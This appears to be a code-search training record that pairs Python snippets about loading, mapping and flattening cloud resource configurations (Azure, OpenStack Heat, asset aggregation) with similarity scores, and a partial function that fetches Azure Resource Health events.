"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def resources(self):",
"def test_load_response_descriptor_events_event_event_resource_spaces(self):\n pass",
"def process_resource_listing(self, resources, context):\n pass",
"def events(self):\r\n return resources.Events(self)",
"def resource_mapping():\n return {\n 'OS::Heat::ResourceChain': ResourceChain,\n }",
"def pop_resources(self):\n resources = self.request_local.resources\n self.request_local.resources = {}\n # deal with aggregated resources\n if resources and \"head\" in resources:\n # This is lazy, because we otherwise run\n # into circular import issues\n if self.aggregation_config is not None:\n self._setup_aggregation_mapping()\n\n\n if self.aggregated_js_mapping:\n self._replace_resources_with_aggregates(resources,\n self.aggregated_js_mapping,\n JSLink,\n )\n if self.aggregated_css_mapping:\n self._replace_resources_with_aggregates(resources,\n self.aggregated_css_mapping,\n CSSLink,\n )\n return resources",
"def create_resources(self) -> List[ResourceDescription]:\r\n return self.resources",
"def _load_resources(self):\n puts = (getattr(self, 'project', None) or self).puts\n for resource_type, resource_cls in six.iteritems(AVAILABLE_RESOURCES):\n for name in self.settings.get(resource_type, {}):\n extra = {\n 'project': getattr(self, 'project', None) or self,\n 'app': self if hasattr(self, 'project') else None,\n }\n\n with indent(4 if hasattr(self, 'project') else 2):\n puts(colored.green(u\"✓ {}:{}\".format(resource_type, name)))\n\n self._resources[resource_type].append(\n resource_cls.factory(\n name=name,\n settings=self.settings.get(resource_type, {})[name],\n **extra\n )\n )",
"def build_resource(self, *args, **kwargs):\r\n r = {}\r\n for current_resource in self.resources:\r\n item = self._get_resource(\r\n repo=self.current_repo, owner=self.owner, \r\n resource=current_resource, **kwargs\r\n )\r\n if not item: continue\r\n r[current_resource] = item\r\n\r\n return r",
"def resources(self):\n return self.__resources",
"def create_resource_config_files(host_config, resource_config, type_map, bus_map, trecs_root_dir, output_dir, resource_config_dir, model_listen_port, agent_listen_port):\n for host in host_config:\n if host['host_type'] != 'RA':\n continue\n\n resource_name = host['attached_resource_name']\n\n init_data = {\n 'RA': {\n 'ip': '127.0.0.1',\n 'listen_port': agent_listen_port\n },\n 'bus_index': bus_map[resource_name],\n 'listen_port': model_listen_port,\n 'log_path': path.join(output_dir, 'csv', '{}.csv'.format(resource_name))\n }\n\n resource = next(resource for resource in resource_config['resources'] if resource['resource_name'] == resource_name)\n for key in resource.keys():\n if key.endswith('_path'):\n cwd = getcwd()\n chdir(resource_config_dir)\n resource[key] = path.abspath(resource[key])\n chdir(cwd)\n\n final_config = init_data.copy()\n final_config.update(resource)\n\n config_file_name = '{}_config.json'.format(resource_name)\n with open(\n path.join(trecs_root_dir, 'run', config_file_name), 'w'\n ) as init_file:\n dump(final_config, init_file)",
"def get_inventory(self, context):\n # See below some example code demonstrating how to return the resource structure\n # and attributes. In real life, of course, if the actual values are not static,\n # this code would be preceded by some SNMP/other calls to get the actual resource information\n '''\n # Add sub resources details\n sub_resources = [ AutoLoadResource(model ='Generic Chassis',name= 'Chassis 1', relative_address='1'),\n AutoLoadResource(model='Generic Module',name= 'Module 1',relative_address= '1/1'),\n AutoLoadResource(model='Generic Port',name= 'Port 1', relative_address='1/1/1'),\n AutoLoadResource(model='Generic Port', name='Port 2', relative_address='1/1/2'),\n AutoLoadResource(model='Generic Power Port', name='Power Port', relative_address='1/PP1')]\n\n\n attributes = [ AutoLoadAttribute(relative_address='', attribute_name='Location', attribute_value='Santa Clara Lab'),\n AutoLoadAttribute('', 'Model', 'Catalyst 3850'),\n AutoLoadAttribute('', 'Vendor', 'Cisco'),\n AutoLoadAttribute('1', 'Serial Number', 'JAE053002JD'),\n AutoLoadAttribute('1', 'Model', 'WS-X4232-GB-RJ'),\n AutoLoadAttribute('1/1', 'Model', 'WS-X4233-GB-EJ'),\n AutoLoadAttribute('1/1', 'Serial Number', 'RVE056702UD'),\n AutoLoadAttribute('1/1/1', 'MAC Address', 'fe80::e10c:f055:f7f1:bb7t16'),\n AutoLoadAttribute('1/1/1', 'IPv4 Address', '192.168.10.7'),\n AutoLoadAttribute('1/1/2', 'MAC Address', 'te67::e40c:g755:f55y:gh7w36'),\n AutoLoadAttribute('1/1/2', 'IPv4 Address', '192.168.10.9'),\n AutoLoadAttribute('1/PP1', 'Model', 'WS-X4232-GB-RJ'),\n AutoLoadAttribute('1/PP1', 'Port Description', 'Power'),\n AutoLoadAttribute('1/PP1', 'Serial Number', 'RVE056702UD')]\n\n return AutoLoadDetails(sub_resources,attributes)\n '''\n\n self._log(context, 'Begin autoload')\n resources = []\n attributes = []\n\n\n attributes.append(AutoLoadAttribute('', 'replication_address', self.get_replication_address(context)))\n attributes.append(AutoLoadAttribute('', 'connection_key', self.get_connection_key(context)))\n\n networks = self._get_newtork_interfaces(context)\n self._log(context, 'got networks')\n\n controllers = self._get_controllers(context)\n self._log(context, 'got controllers')\n ports = self._get_ports(context)\n\n model = None\n for controller in controllers:\n self._log(context, 'Processing ctrlt: ' + controller['name'] + ':' + controller['model'])\n resources.append(AutoLoadResource(model='Generic Storage Controller', name=controller['name'],\n relative_address=controller['name']))\n if model is None:\n model = controller['model']\n\n attributes.append(AutoLoadAttribute('', 'Model', model))\n\n for network in networks:\n self._log(context, 'Processing netwk: ' + network['name'] + ':' + str(network['address']))\n net_name = network['name']\n controller = net_name.split('.')[0]\n if 'vir0' in controller or 'vir1' in controller:\n attributes.append(AutoLoadAttribute('',str(controller + '_address'), str(network['address'])))\n continue\n if 'vir' in controller:\n continue\n if 'management' not in network['services']:\n continue\n resources.append(AutoLoadResource(model='Storage Network Port', name=net_name,\n relative_address=controller.upper() + '/' + str(network['address'])))\n\n for port in ports:\n if port['iqn'] is not None:\n port_name = port['name']\n controller = port_name.split('.')[0]\n resources.append(AutoLoadResource(model='iSCSI Storage Port', name=port['name'],\n relative_address=controller + '/' + port['portal']))\n attributes.append(AutoLoadAttribute(controller + '/' + port['portal'], 'iqn', 
port['iqn']))\n elif port['wwn'] is not None:\n port_name = port['name']\n controller = port_name.split('.')[0]\n resources.append(AutoLoadResource(model='FC Storage Port', name=port['name'],\n relative_address=controller + '/' + port['name'].split('.')[1]))\n attributes.append(AutoLoadAttribute(controller + '/' + port['name'].split('.')[1], 'wwn', port['wwn']))\n\n return AutoLoadDetails(resources, attributes)",
"def create_external_resources(self) -> List[ResourceDescription]:\r\n return effects.get_effect_resources()",
"def gen_router_resources(self):\n\n print \"\\t* Adding router resources to compute template\"\n\n from nova import version\n year = version.version_string()\n\n for idx, router in enumerate(self.tenant_routers):\n router_ports = []\n for port in self.all_ports:\n if router[\"id\"] == port[\"device_id\"]:\n router_ports.append(port)\n\n # add the router definition\n if \"2013\" in year:\n # Havana Format\n data = {\"type\": \"OS::Neutron::Router\"}\n self.compute_data[\"resources\"][\"router%s\" % str(idx)] = data\n\n # routers without external gateway\n if router[\"external_gateway_info\"] is not None:\n\n name = {\"get_resource\": \"router%s\" % str(idx)}\n netid = {\"get_param\": \"public_net_%s\" % str(idx)}\n\n # add the router gateway\n data = {\"type\": \"OS::Neutron::RouterGateway\",\n \"properties\": {\n \"router_id\": name,\n \"network_id\": netid\n }}\n\n self.compute_data[\"resources\"][\"router_gateway%s\" % str(idx)] = data\n\n else:\n # Icehouse Format\n rtrName = router[\"name\"]\n # routers without external gateway\n if router[\"external_gateway_info\"] is not None:\n data = {\"type\": \"OS::Neutron::Router\",\n \"properties\": {\n \"name\": rtrName,\n \"external_gateway_info\": {\n \"network\": {\n \"get_param\": \"public_net_%s\" % str(idx)\n }\n }\n }}\n else:\n data = {\"type\": \"OS::Neutron::Router\",\n \"properties\": {\n \"name\": rtrName\n }\n }\n self.compute_data[\"resources\"][\"router%s\" % str(idx)] = data\n\n # internal port information needed\n internal_interfaces = filter(lambda port: port[\"device_owner\"] == \"network:router_interface\", router_ports)\n\n for idxs, interface in enumerate(internal_interfaces):\n # add the router interface\n\n for fixedip in interface[\"fixed_ips\"]:\n\n # create router interface\n data = {\"type\": \"OS::Neutron::RouterInterface\",\n \"properties\": {\n \"router_id\": {\"get_resource\": \"router%s\" % str(idx)},\n \"port_id\": {\"get_resource\": \"port_%s_%s\" % (str(idx), str(idxs))}\n }}\n self.compute_data[\"resources\"][\"router_interface%s_%s\" % (str(idx), str(idxs))] = data\n\n # create router port\n network = self.neutronclient.show_subnet(fixedip[\"subnet_id\"])[\"subnet\"][\"network_id\"]\n net_name = \"%s\" % str(self.neutronclient.show_network(network)[\"network\"][\"name\"])\n net_id = self.neutronclient.show_network(network)[\"network\"][\"id\"]\n\n fixed_ips = [{\"ip_address\": fixedip[\"ip_address\"]}]\n net = self.neutronclient.show_network(network)[\"network\"]\n if net[\"shared\"] is True:\n data = {\"type\": \"OS::Neutron::Port\",\n \"properties\": {\n \"fixed_ips\": fixed_ips,\n \"network_id\": net_id\n }}\n else:\n data = {\"type\": \"OS::Neutron::Port\",\n \"properties\": {\n \"fixed_ips\": fixed_ips,\n \"network_id\": {\"get_resource\": net_name}\n }}\n self.compute_data[\"resources\"][\"port_%s_%s\" % (str(idx), str(idxs))] = data",
"def _get_all_resources(self):\n all_resources = []\n for resource in ResourceModel.scan():\n all_resources.append(resource)\n return all_resources",
"def get_resources(self):\n return []",
"def resource_map(self):",
"def add_resources(event):\n anuket_resources.need()",
"def get_resources(minify=False):\n all_resources = dict()\n subclasses = resource_base.ResourceBase.__subclasses__() + resource_definitions.ResourceAngular.__subclasses__()\n for resource in subclasses:\n obj = resource(minify)\n all_resources[resource.RESOURCE_NAME] = dict(css=tuple(obj.resources_css), js=tuple(obj.resources_js))\n return all_resources",
"def refresh_resources_properties(state, output, update_runtime_props=True):\n resources = {}\n for resource in state.get('resources', []):\n resources[resource[NAME]] = resource\n for module in state.get('modules', []):\n for name, definition in module.get('resources', {}).items():\n resources[name] = definition\n if update_runtime_props:\n ctx.instance.runtime_properties['resources'] = resources\n # Duplicate for backward compatibility.\n ctx.instance.runtime_properties[STATE] = resources\n ctx.instance.runtime_properties['outputs'] = \\\n filter_state_for_sensitive_properties(output)\n store_sensitive_properties(output=output)",
"def __mapAzResourceConfigObject(self, azResourceConfigObj: Dict) -> List[Dict[str, str]]:\n resources = []\n for armType in azResourceConfigObj:\n armResources = azResourceConfigObj[armType]\n\n # Flatten the structure by compiling all the resources corresponding to each ARM type.\n mappedResources = [{ARM_TYPE: armType,\n **armResources[instance]} for instance in armResources]\n resources.extend(mappedResources)\n\n return resources"
] |
[
"0.58181536",
"0.57214403",
"0.5425466",
"0.53549063",
"0.53549063",
"0.53549063",
"0.53435004",
"0.53435004",
"0.53435004",
"0.5334005",
"0.5319617",
"0.5272405",
"0.52459764",
"0.5224623",
"0.52026635",
"0.5195314",
"0.5141163",
"0.5123107",
"0.51167065",
"0.5113912",
"0.5062019",
"0.50595784",
"0.5032333",
"0.50248694",
"0.5008691",
"0.5004105",
"0.5001541",
"0.5000492",
"0.4996896",
"0.49964106"
] |
0.6537761
|
0
|
Map the global Azure resource config mapping to a flat structure.
|
def __mapAzResourceConfigObject(self, azResourceConfigObj: Dict) -> List[Dict[str, str]]:
resources = []
for armType in azResourceConfigObj:
armResources = azResourceConfigObj[armType]
# Flatten the structure by compiling all the resources corresponding to each ARM type.
mappedResources = [{ARM_TYPE: armType,
**armResources[instance]} for instance in armResources]
resources.extend(mappedResources)
return resources
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def resource_map(self):",
"def resource_mapping():\n return {\n 'OS::Heat::ResourceChain': ResourceChain,\n }",
"def resource_map():\n resource_map = deepcopy(BASE_RESOURCE_MAP)\n\n if CompareOpenStackReleases(os_release('keystone')) < 'liberty':\n resource_map.pop(POLICY_JSON)\n if os.path.exists('/etc/apache2/conf-available'):\n resource_map.pop(APACHE_CONF)\n else:\n resource_map.pop(APACHE_24_CONF)\n\n if run_in_apache():\n for cfile in resource_map:\n svcs = resource_map[cfile]['services']\n if 'keystone' in svcs:\n svcs.remove('keystone')\n if 'apache2' not in svcs:\n svcs.append('apache2')\n admin_script = os.path.join(git_determine_usr_bin(),\n \"keystone-wsgi-admin\")\n public_script = os.path.join(git_determine_usr_bin(),\n \"keystone-wsgi-public\")\n resource_map[WSGI_KEYSTONE_API_CONF] = {\n 'contexts': [\n context.WSGIWorkerConfigContext(name=\"keystone\",\n admin_script=admin_script,\n public_script=public_script),\n keystone_context.KeystoneContext()],\n 'services': ['apache2']\n }\n return resource_map",
"def load_resource_map():\n # to avoid a circular dependency\n from coinbase_commerce.api_resources.base import APIResource\n global RESOURCE_MAP\n RESOURCE_MAP = {k.RESOURCE_NAME: k for k in APIResource.get_subclasses()\n if getattr(k, \"RESOURCE_NAME\", None)}",
"def create_resource_config_files(host_config, resource_config, type_map, bus_map, trecs_root_dir, output_dir, resource_config_dir, model_listen_port, agent_listen_port):\n for host in host_config:\n if host['host_type'] != 'RA':\n continue\n\n resource_name = host['attached_resource_name']\n\n init_data = {\n 'RA': {\n 'ip': '127.0.0.1',\n 'listen_port': agent_listen_port\n },\n 'bus_index': bus_map[resource_name],\n 'listen_port': model_listen_port,\n 'log_path': path.join(output_dir, 'csv', '{}.csv'.format(resource_name))\n }\n\n resource = next(resource for resource in resource_config['resources'] if resource['resource_name'] == resource_name)\n for key in resource.keys():\n if key.endswith('_path'):\n cwd = getcwd()\n chdir(resource_config_dir)\n resource[key] = path.abspath(resource[key])\n chdir(cwd)\n\n final_config = init_data.copy()\n final_config.update(resource)\n\n config_file_name = '{}_config.json'.format(resource_name)\n with open(\n path.join(trecs_root_dir, 'run', config_file_name), 'w'\n ) as init_file:\n dump(final_config, init_file)",
"def pre_config_root_create(self, resource_dict):\n pass",
"def pre_global_vrouter_config_create(self, resource_dict):\n pass",
"def pre_global_system_config_create(self, resource_dict):\n pass",
"def get_configmap_dict():\n template = textwrap.dedent(\n \"\"\"\n kind: ConfigMap\n apiVersion: v1\n metadata:\n name: fio-config\n data:\n workload.fio: |\n # here comes workload configuration\n \"\"\"\n )\n cm_dict = yaml.safe_load(template)\n return cm_dict",
"def post_config_root_read(self, resource_id, resource_dict):\n pass",
"def post_global_vrouter_config_read(self, resource_id, resource_dict):\n pass",
"def add_custom_resources(resources, resource_mapping=RESOURCE_MAPPING):\n for key, val in resources.items():\n if key not in resource_mapping:\n resource_mapping[key] = tuple()\n\n # make sure the resource name itself is an alias\n resource_mapping[key] += (key,)\n if isinstance(val, list):\n for alias in val:\n if val != key:\n resource_mapping[key] += (alias,)\n else:\n if val != key:\n resource_mapping[key] += (val,)",
"def post_global_system_config_read(self, resource_id, resource_dict):\n pass",
"def post_config_root_create(self, resource_dict):\n pass",
"def pre_global_vrouter_config_update(self, resource_id, resource_dict):\n pass",
"def set_global_sqla_resources(sqla_resources):\n md = sqla_resources.get_metadata()\n #_bind_tables_to_metadata(md, nest_project)\n GLOBAL_SQLA_RESOURCES = sqla_resources\n return",
"def pre_config_root_update(self, resource_id, resource_dict):\n pass",
"def map_to_app_resources(self, app):\n # TODO: Extract resources app data\n pass",
"def generate_config(context):\n\n properties = context.properties\n\n base_resource = get_type(context)\n\n resources = []\n\n if 'dependsOn' in properties:\n dependson = {'metadata': {'dependsOn': properties['dependsOn']}}\n dependson_root = properties['dependsOn']\n else:\n dependson = {}\n dependson_root = []\n\n for role in properties['roles']:\n for member in role['members']:\n suffix = sha1(\n '{}-{}'.format(role['role'], member).encode('utf-8')).hexdigest()[:10]\n policy_get_name = '{}-{}'.format(context.env['name'], suffix)\n\n resource_name = '{}-{}'.format(policy_get_name,\n base_resource['postfix'])\n iam_resource = {\n 'name': resource_name,\n # TODO - Virtual type documentation needed\n 'type': base_resource['dm_type'],\n 'properties': {\n base_resource['dm_resource_property']: base_resource['id'],\n 'role': role['role'],\n 'member': member,\n }\n }\n iam_resource.update(dependson)\n resources.append(iam_resource)\n\n dependson = {'metadata': {'dependsOn': [\n resource_name] + dependson_root}}\n\n return {\"resources\": resources}",
"def pre_global_system_config_update(self, resource_id, resource_dict):\n pass",
"def _get_config_map():\n path = os.path.join(os.path.dirname(__file__), \"nadamw_configs.json\")\n configs = json.loads(open(path).read())\n return configs",
"def post_global_system_config_create(self, resource_dict):\n pass",
"def loadConfig():\n global abs_path, app_list, app_api_subs\n\n # load application details\n with open(abs_path + '/../../../../config/apim.yaml', 'r') as file:\n apim_config = yaml.load(file, Loader=yaml.FullLoader)\n apps = apim_config['apps']\n\n for app in apps:\n app_list[app['name']] = []\n app_api_subs[app['name']] = app['api_subscriptions'].split(',')",
"def post_global_vrouter_config_create(self, resource_dict):\n pass",
"def restart_map():\n _map = []\n for f, ctxt in CONFIG_FILES.iteritems():\n svcs = []\n for svc in ctxt['services']:\n svcs.append(svc)\n if svcs:\n _map.append((f, svcs))\n return OrderedDict(_map)",
"def _convert_resources_to_urls(\n self, configuration_dict: Dict[str, Any]\n ) -> Dict[str, Any]:\n configuration_dict = deepcopy(configuration_dict)\n existing_machine_type = configuration_dict[\"machineType\"]\n if not re.search(\".*/machineTypes/.*\", existing_machine_type):\n configuration_dict[\n \"machineType\"\n ] = \"zones/{zone}/machineTypes/{machine_type}\".format(\n zone=self.availability_zone,\n machine_type=configuration_dict[\"machineType\"],\n )\n\n for accelerator in configuration_dict.get(\"guestAccelerators\", []):\n gpu_type = accelerator[\"acceleratorType\"]\n if not re.search(\".*/acceleratorTypes/.*\", gpu_type):\n accelerator[\n \"acceleratorType\"\n ] = \"projects/{project}/zones/{zone}/acceleratorTypes/{accelerator}\".format( # noqa: E501\n project=self.project_id,\n zone=self.availability_zone,\n accelerator=gpu_type,\n )\n\n return configuration_dict",
"def _get_config_dict():\r\n return CONFIGS",
"def generate_config(context):\n\n resources = []\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n name = properties.get('name', context.env['name'])\n\n resource = {\n 'name': context.env['name'],\n # https://cloud.google.com/filestore/docs/reference/rest/v1beta1/projects.locations.instances/create\n 'type': 'gcp-types/file-v1beta1:projects.locations.instances',\n 'properties': {\n 'parent': 'projects/{}/locations/{}'.format(project_id, properties['location']),\n 'instanceId': name,\n }\n }\n\n optional_props = [\n 'description',\n 'tier',\n 'labels',\n 'fileShares',\n 'networks',\n ]\n\n for prop in optional_props:\n if prop in properties:\n resource['properties'][prop] = properties[prop]\n\n resources.append(resource)\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'name',\n 'value': name\n },\n {\n 'name': 'fileShares',\n 'value': '$(ref.{}.fileShares)'.format(context.env['name'])\n },\n {\n 'name': 'networks',\n 'value': '$(ref.{}.networks)'.format(context.env['name'])\n }\n ]\n }",
"def pre_global_vrouter_config_read(self, resource_id):\n pass",
"def _build_elbv2_mapping_from_resources(resource_to_analyse, result_dict, session):\n for elb_instance, security_group_id, security_group_name in _generate_elb_instances_and_sg(resource_to_analyse, session):\n resource_dict = _check_if_in_list(result_dict, elb_instance[\"LoadBalancerName\"], \"resource_id\")\n if resource_dict is not None:\n resource_dict[\"sg_attached\"].append({\n \"sg_id\": security_group_id,\n \"sg_name\": security_group_name\n })\n else:\n result_dict.append({\n \"resource_id\": elb_instance[\"LoadBalancerName\"],\n \"resource_type\": \"elb\",\n \"sg_attached\": [{\n \"sg_id\": security_group_id,\n \"sg_name\": security_group_name\n }]\n })\n return result_dict"
] |
[
"0.65116477",
"0.6337193",
"0.59461796",
"0.5896368",
"0.58180165",
"0.56846714",
"0.5651048",
"0.5638168",
"0.55788946",
"0.5516219",
"0.55128187",
"0.5509055",
"0.53902495",
"0.53838235",
"0.5382216",
"0.53783756",
"0.537411",
"0.53525007",
"0.53490853",
"0.53422743",
"0.53149796",
"0.53145057",
"0.5269981",
"0.5256161",
"0.52411956",
"0.52128375",
"0.5205212",
"0.5204206",
"0.51885974",
"0.51847947"
] |
0.68334466
|
0
|
Remove the duplicate dictionaries from a list.
|
def __removeDuplicateDictsFromList(self, listOfDicts: List[Dict[str, str]]) -> List[Dict[str, str]]:
return list({frozenset(item.items()): item for item in listOfDicts}.values())
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remove_duplicates(input_list):\n return list(dict.fromkeys(input_list))",
"def remove_duplicate_dicts(data: List[dict]) -> List[dict]:\n return [dict(y) for y in set(tuple(x.items()) for x in data)]",
"def removeDups(lst):\n\n return list(dict.fromkeys(lst) )",
"def _remove_duplicates(input_list):\n return list(OrderedDict.fromkeys(input_list))",
"def delete_duplicate(x):\n return list(dict.fromkeys(x))",
"def duplicates(self, x):\n return list(dict.fromkeys(x))",
"def find_duplicates(inlist):\n \n D = defaultdict(list)\n for i,item in enumerate(mylist):\n D[item].append(i)\n D = {k:v for k,v in list(D.items()) if len(v)>1}\n \n return D",
"def _coalesce_dicts(self, list_of_dicts):\n coalesced_list_of_dicts = [{}]\n for item in list_of_dicts:\n found = False\n for dict_items in coalesced_list_of_dicts:\n if list(item.keys())[0] not in dict_items:\n dict_items.update(item)\n found = True\n break\n if not found:\n coalesced_list_of_dicts.append(item)\n return coalesced_list_of_dicts",
"def unique(list_: List) -> List:\n return list(collections.OrderedDict.fromkeys(list_))",
"def _uniq( list ) : \r\n \r\n d = {} \r\n for e in list : \r\n d[e] = 1 \r\n \r\n return d.keys()",
"def _uniq(self, lst):\n h = {}\n for e in lst:\n h[e] = 1\n return sorted(h.keys())",
"def removeDuplicates(list):\n\treturn Set((item for item in list))",
"def remove_duplicates(input, create=False):\n # input is a list of dicts\n seen = set()\n filtered_list = []\n for attr_dict in input:\n str_repr = make_string(attr_dict, create=create)\n if str_repr not in seen:\n seen.add(str_repr)\n filtered_list.append(attr_dict)\n\n return filtered_list",
"def _deduplicate(lst):\n out = []\n for i in lst:\n if i not in out:\n out.append(i)\n return out",
"def test_magicdictlist_dedupe():\n d1 = magicdictlist()\n\n d1['key1'].append('1 hello')\n d1['key1'].append('1 world')\n d1['key2'].append('2 hello')\n d1['key1'].append('1 world')\n\n d2 = d1.dedupe()\n assert len(d2) == 2\n assert len(d2['key1']) == 2\n assert len(d2['key2']) == 1\n assert set(d2['key1']) == set(['1 hello', '1 world'])\n assert d2['key2'] == ['2 hello']",
"def Deduplicate(items):\n seen = set()\n for it in items:\n if it not in seen:\n seen.add(it)\n yield it",
"def dict_copies(my_dict, num_copies):\n answer = []\n for idx in range(num_copies):\n answer.append(dict(my_dict))\n return answer",
"def remove_duplicates(self,list_):\r\n ret =[]\r\n\r\n for item in list_:\r\n if item not in ret:\r\n ret.append(item)\r\n removed = len(list_)-len(ret)\r\n logger.info('%d duplicate%s removed.' %(removed,plural_or_not(removed)))\r\n return ret",
"def duplicate_train_items(train_items: List[JSONDict]) -> List[JSONDict]:\n train_items[1][\"url\"] = train_items[0][\"url\"]\n return train_items",
"def removeDuplicates(list):\n\treturn set((item for item in list))",
"def uniqueDicts(obj):\n return [json.loads(d) for d in set(json.dumps(r, sort_keys=True) for o in obj)]",
"def remove_duplicates(data):\n already_used_items = {}\n return_data = []\n\n for item in data:\n # Yes, I know that I can find used items in the return_data,\n # but HW requires this logic.\n if not already_used_items.get(item):\n return_data.append(item)\n already_used_items[item] = True\n\n return return_data",
"def deduped(items):\n\n # # create an empty dictionary\n # # create an emtpy list that we will return \n # # Loop through the items in the list, if the item is not in the dict, add item to the list, and to the dict\n # # If the item is in the dict, increase the count by 1\n # # If the item is in the dict already, dont add the item to the list\n # # return list\n\n\n # duplicate_counts = {}\n\n # deduped = []\n\n # for item in items:\n # duplicate_counts[item] = duplicate_counts.get(item, 0) + 1\n\n\n # if duplicate_counts[item] == 1:\n # deduped.append(item)\n\n # return deduped\n\n ##################### HB SOLUTION ####################################\n\n # # sets are great for de-duplicating lists:\n # # sets dont maintain oder though, so if we want our answer to be in order\n # # we have to do the de-duplicating by hand\n # # however... this runtime would be O(n^2) becaause we have a for loop\n # # and nested inside that, we have an in which is a hidden for-loop\n # # for every charecter that we are looping over, we have to loop in deduped\n # # to check if that charecter is in there\n # # we dont want this \n\n # deduped = []\n\n # for char in items:\n # if char not in deduped:\n # deduped.append(char)\n \n # return deduped\n\n # instead we can use use a set to keep track of what we have seen and use a list\n # to hold the final results\n\n # keep track of what we have seen\n seen = set()\n\n # deduped will be what we return \n deduped = []\n\n for item in items:\n if item not in seen:\n deduped.append(item)\n seen.add(item)\n\n return deduped",
"def has_duplicates_dict(L):\r\n unique = {}\r\n for e in L:\r\n if e in unique:\r\n return True\r\n unique[e] = 0\r\n return False",
"def unique_list(src_list):\n return list(OrderedDict.fromkeys(src_list).keys())",
"def unique_dicts(d):\n return [dict(y) for y in set(tuple(x.items()) for x in d)]",
"def deduplicate_list(lst):\n return list(set(lst))",
"def dedup(iterable):\n return iter(OrderedDict.fromkeys(iterable))",
"def remove_duplicates_in_items(items: list, id_key: str) -> list:\n ids = {}\n new_items = []\n for item in items:\n item_id = item.get(id_key)\n if item_id not in ids:\n ids[item_id] = True\n new_items.append(item)\n\n return new_items",
"def diff_list_of_dict(old_list, new_list):\n new_set = set([dict2str(i) for i in new_list])\n old_set = set([dict2str(i) for i in old_list])\n added = new_set - old_set\n removed = old_set - new_set\n return [str2dict(a) for a in added], [str2dict(r) for r in removed]"
] |
[
"0.7726228",
"0.7527608",
"0.743368",
"0.7322726",
"0.67764497",
"0.6705668",
"0.660935",
"0.65197814",
"0.6485394",
"0.6389307",
"0.62858564",
"0.62466526",
"0.6226824",
"0.6189385",
"0.6180072",
"0.6164874",
"0.616072",
"0.6154857",
"0.6145726",
"0.6128122",
"0.6096065",
"0.6069391",
"0.6067368",
"0.6065973",
"0.60167134",
"0.5959633",
"0.59559625",
"0.5955381",
"0.595019",
"0.59434795"
] |
0.7735982
|
0
|
Fetch health events using RH API and update the lastResult variable.
|
def __getRHEventsAndUpdateResult(self, resource: Dict[str, str]) -> None:
# Validate the state data.
self.__validateResourceStateEntry(resource)
self.tracer.info("[%s] Fetching the RH events for resource = %s" % (
self.fullName, resource[AZ_RESOURCE_ID]))
# Extract the polling state for the current resource.
resourcePollingState = self.pollingState.get(
resource[AZ_RESOURCE_ID], {})
self.tracer.info("[%s] polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], resourcePollingState))
rcaPollingState = resourcePollingState.get(RCA, [])
self.tracer.info("[%s] RCA polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], rcaPollingState))
# Parse the minimum time. datetime.min can't be used as the year is not formatted with zero padding.
datetimeMin = datetime.strptime(MIN_DATETIME, OCCURED_TIME_FORMAT[0])
# Fetch the occuredTime of the last record that was pushed to LA for the given resource.
lastOccuredTime = resourcePollingState.get(
LAST_OCCURED_TIME, datetimeMin)
self.tracer.info("[%s] lastOccuredTime from polling state for resource with Id = %s is %s" % (
self.fullName, resource[AZ_RESOURCE_ID], lastOccuredTime))
# Variable to store updated occuredTime in case new health events are obtained from RH.
updatedLastOccuredTime = lastOccuredTime
try:
rhEvents = self.rhClient.getHistoricalResourceAvailabilityEvents(
self.providerInstance.ctx.authToken, resource[AZ_RESOURCE_ID])
self.tracer.info("[%s] number of RH events received = %s; resourceId=%s; numberOfEventsCompiledForAllResourcesSoFar=%s" % (
self.fullName, len(rhEvents), resource[AZ_RESOURCE_ID], len(self.lastResult)))
numberOfNewEvents = 0
rhEventIds = []
for event in rhEvents:
hasRca = False
rhEventIds.append(event[ID])
currentOccuredTime = self.__parseOccuredTime(
event[PROPERTIES][OCCURED_TIME])
# Update the lastOccuredTime which can be stored in the state file for the current resource.
if currentOccuredTime > updatedLastOccuredTime:
updatedLastOccuredTime = currentOccuredTime
# Check if the event has been previously processed using the occuredTime.
# This will occur because the health events are obtained for the last one day and the polling frequency is 15 minutes.
# In case the event has RCA, the event will have the same occuredTime as the transition event for the same issue. Additional checks are required.
if currentOccuredTime <= lastOccuredTime:
if self.__isNotRcaEvent(event):
# Skip this event. This has already been processed.
continue
else:
# This is an RCA event.
eventTitle = event[PROPERTIES][TITLE] if TITLE in event[PROPERTIES] else None
self.tracer.info("[%s] RCA event older than lastOccuredTime received for resourceId=%s; RH event id=%s; title=%s" % (
self.fullName, resource[AZ_RESOURCE_ID], event[ID], eventTitle))
hasRca = True
if event[ID] in rcaPollingState:
# Skip this event. The RCA event has been processed before.
continue
# New RCA event has been received. Add it to the state variable.
rcaPollingState.append(event[ID])
numberOfNewEvents += 1
# Sanitize the data and add additional data related to the resource. HTML tags are converted to markdown format and action tags are removed.
sanitizedEvent = self.__sanitizeEvent(event, resource, hasRca)
self.lastResult.extend([sanitizedEvent])
self.tracer.info("[%s] resourceId=%s; number of RH events received = %s; numberOfNewEvents=%s; updatedLastOccuredTime=%s" % (
self.fullName, resource[AZ_RESOURCE_ID], len(rhEvents), numberOfNewEvents, updatedLastOccuredTime))
# Clean up rcaPollingState to remove the stale entries.
rcaEventCountBeforeCleanUp = len(rcaPollingState)
rcaPollingState = self.__cleanRcaPollingState(
rhEventIds, rcaPollingState)
self.tracer.info("[%s] resourceId=%s; rcaEventCountBeforeCleanUp = %s; rcaEventCountAfterCleanUp=%s" % (
            self.fullName, resource[AZ_RESOURCE_ID], rcaEventCountBeforeCleanUp, len(rcaPollingState)))
# Update the values for the current resource in the shared state dictionary.
self.pollingState[resource[AZ_RESOURCE_ID]] = {
LAST_OCCURED_TIME: updatedLastOccuredTime, LAST_RUN_TIMESTAMP: datetime.now(), RCA: rcaPollingState}
except Exception as e:
